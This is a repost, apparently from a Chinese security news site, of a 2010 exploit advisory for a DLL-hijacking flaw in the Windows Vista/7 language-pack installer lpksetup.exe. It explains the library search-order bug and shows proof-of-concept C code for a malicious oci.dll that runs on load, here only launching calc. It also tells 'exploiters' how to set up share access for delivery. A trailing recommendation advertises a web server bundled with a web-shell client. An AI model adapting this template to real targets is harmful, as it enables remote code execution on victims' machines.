Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking

admin 2021年4月3日19:36:59评论43 views字数 1801阅读6分0秒阅读模式

Windows Vista / 7 lpksetup.exe 的 DLL 劫持,Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking。

/*
Exploit: Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking
Vulnerability
Extension: .mlc
Author: Tyler Borland ([email protected])
Date: 10/20/2010
Tested on: Windows 7 Ultimate (Windows Vista Ultimate/Enterpries and
Windows 7 Enterprise should be vulnerable as well)
Effect: Remote Code Execution

lpksetup is the language pack installer that is included by default with
Windows Vista/7 Ultimate or Enterprise editions. By opening a .mlc file
through something like an open SMB or WebDav share, the oci.dll file will be
grabbed and ran in the context of the vulnerable application.

This is a LoadLibrary() load path bug. The load library search order is:
1. The directory from which the application loaded
2. 32-bit System directory (WindowsSystem32)
3. 16-bit System directory (WindowsSystem)
4. Windows directory (Windows)
5. Current working directory
6. Directories in the PATH environment variable
As OracleOciLib is not used on target system, oci.dll does not exist, so if
a full path is not supplied when calling the dll or the search path has not
been cleared before the call, we will hit our fifth search path and load the
library from the remote filesystem.

Interestingly enough, while lpksetup is blocked for execution by UAC under a
normal user, the injected library (payload) will still execute.
Exploiters make sure your system's security policy, secpol.msc, allows
complete anonymous share access for connecting users.
Outlook links seem to be the current exploit toyland, other vectors:
http://www.binaryplanting.com/attackVectors.htm
*/

#include

int main()
{
WinExec("calc", SW_NORMAL); // the typical non-lethal PoC
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
main();
return 0;
}

文章来源于lcx.cc:Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking

相关推荐: acat.jar 迷你 WebServer 自带菜刀 java 版

下载: ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar ACat.jar、ACat-附数据库驱动.jar 源码:ACat-src.zip 描述: 这是一个用java实现的非常小(18kb)的webServer。之前在drops发了…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:36:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijackinghttp://cn-sec.com/archives/323914.html

发表评论

匿名网友 填写信息